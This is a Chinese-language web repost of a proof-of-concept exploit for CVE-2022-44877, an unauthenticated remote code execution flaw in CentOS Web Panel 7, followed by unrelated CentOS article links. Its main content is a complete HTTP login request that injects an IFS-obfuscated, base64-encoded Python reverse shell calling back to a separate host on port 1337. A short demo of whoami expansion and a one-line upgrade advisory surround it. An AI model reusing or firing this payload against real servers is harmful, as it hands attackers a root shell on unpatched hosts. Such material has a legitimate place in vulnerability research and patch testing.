Centos Web 面板 7 未经身份验证的远程代码执行 - CVE-2022-44877
2023-06-13 09:17:11 时间
[+] Centos Web Panel 7 Unauthenticated Remote Code Execution
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
➜ CVE-2022-44877 echo "example_log" >> log
➜ CVE-2022-44877 cat log
example_log
➜ CVE-2022-44877 echo "example_log $(whoami)" >> log
➜ CVE-2022-44877 cat log
example_log
example_log root
➜ CVE-2022-44877
POC
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=toor&commit=Login
解决方案升级到 CWP7 当前版本。
相关文章
- linux 误删文件恢复_centos删除的文件能恢复吗
- centos 6 编译安装内核
- 虚拟机Centos 7 使用命令 ip addr 不显示IP地址[通俗易懂]
- centos系统不识别u盘_Unable to locate package vim
- 修改CentOS系统语言为中文
- CentOS Nginx php 安装中文分词SCWS扩展
- centos 6.x 设置默认的 python 2.6 为 python 2.7详解程序员
- Centos文件切割利器_split命令及cat命令合并文件详解程序员
- Centos 安装 PHP7.4 和 Nginx的操作方法
- Centos 6.9 安装xtrabackup-2.4.8 通用包,yum安装,全量备份,增量备份详解数据库
- CentOS 7.X 设置系统时间详解程序员
- 使用commit方式构建具有sshd服务的centos镜像详解架构师
- 查看CentOS版本:Linux解决方案(linux查看centos版本)
- Centos步骤简明教程:安装Oracle 11g(centos安装oracle11g)
- CentOS安装php及其扩展详解编程语言
- 数据库构建Web与MySQL数据库之间的连接(web连接mysql)
- 如何在CentOS 8上使用SSL/TLS安装vsftpd FTP服务器
- Linux为Web服务器带来的福音(linux做web服务器)
- 服务器极速搭建Linux Web 服务器,让你享受极速体验!(linux搭建web)
- Red Hat雇用CentOS开发者
- 如何在CentOS/RHEL上设置SSH免密码登录
- 管理MSSQL的好帮手:在线Web管理器来帮忙!(在线web管理mssql)
- CentOS下搭建MySQL环境小贴士(centos下mysql)
- CentOS 7开启MySQL之旅(cent7启动mysql)
- Web端登录Redis提高数据库性能(web登录redis作用)
- Web工程基于Redis的有效连接方案(web工程连接redis)
- 抉择Web还是Redis(web和redis哪个好)
- CentOS下使用Squid架设CDN服务器的方法